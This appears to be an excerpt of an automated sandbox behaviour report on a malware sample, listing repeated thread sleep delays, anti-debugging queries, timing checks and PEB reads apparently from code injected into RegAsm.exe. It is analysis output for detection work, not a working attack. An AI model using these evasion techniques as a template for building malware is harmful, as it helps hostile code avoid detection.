            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598372
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597472
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596962
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596835
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596723
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596594
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596357
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596108
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595958
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595826
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595710
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595532
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595313
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595032
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594877
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594615
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594453
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594327
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593874
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593614
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593485
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599844
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599334
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599141
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598986
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598846
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598719
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598577
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597707
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597340
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597093
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 578422
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599759
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599643
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599520
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599153
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599046
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598718
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598499
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598254
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597920
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596991
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595796
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595687
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595359
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594806
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599754
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599516
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599381
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598995
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598652
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597575
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597462
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597322
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597071
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596647
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596498
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596373
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596136
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595674
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595542
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595413
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595252
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594965
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594641
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594510
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594385
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594277
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594027
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593909
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593209
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593078
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592859
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592587
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592476
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592374
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe, Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\findstr.exe, Process queried: DebugPort
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif, Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F7096E rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_00417A33 LdrLoadDll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F347FB mov eax, dword ptr fs:[00000030h]7_2_02F347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F347FB mov eax, dword ptr fs:[00000030h]7_2_02F347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]7_2_02FBE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]7_2_02F3C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB07C3 mov eax, dword ptr fs:[00000030h]7_2_02FB07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F307AF mov eax, dword ptr fs:[00000030h]7_2_02F307AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE47A0 mov eax, dword ptr fs:[00000030h]7_2_02FE47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD678E mov eax, dword ptr fs:[00000030h]7_2_02FD678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38770 mov eax, dword ptr fs:[00000030h]7_2_02F38770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30750 mov eax, dword ptr fs:[00000030h]7_2_02F30750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE75D mov eax, dword ptr fs:[00000030h]7_2_02FBE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72750 mov eax, dword ptr fs:[00000030h]7_2_02F72750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72750 mov eax, dword ptr fs:[00000030h]7_2_02F72750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB4755 mov eax, dword ptr fs:[00000030h]7_2_02FB4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov esi, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov eax, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov eax, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov eax, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov ecx, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov eax, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAC730 mov eax, dword ptr fs:[00000030h]7_2_02FAC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C720 mov eax, dword ptr fs:[00000030h]7_2_02F6C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C720 mov eax, dword ptr fs:[00000030h]7_2_02F6C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30710 mov eax, dword ptr fs:[00000030h]7_2_02F30710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F60710 mov eax, dword ptr fs:[00000030h]7_2_02F60710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C700 mov eax, dword ptr fs:[00000030h]7_2_02F6C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F304E5 mov ecx, dword ptr fs:[00000030h]7_2_02F304E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F644B0 mov ecx, dword ptr fs:[00000030h]7_2_02F644B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]7_2_02FBA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F364AB mov eax, dword ptr fs:[00000030h]7_2_02F364AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA49A mov eax, dword ptr fs:[00000030h]7_2_02FEA49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBC460 mov ecx, dword ptr fs:[00000030h]7_2_02FBC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA456 mov eax, dword ptr fs:[00000030h]7_2_02FEA456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2645D mov eax, dword ptr fs:[00000030h]7_2_02F2645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5245A mov eax, dword ptr fs:[00000030h]7_2_02F5245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E443 mov eax, dword ptr fs:[00000030h]7_2_02F6E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A430 mov eax, dword ptr fs:[00000030h]7_2_02F6A430
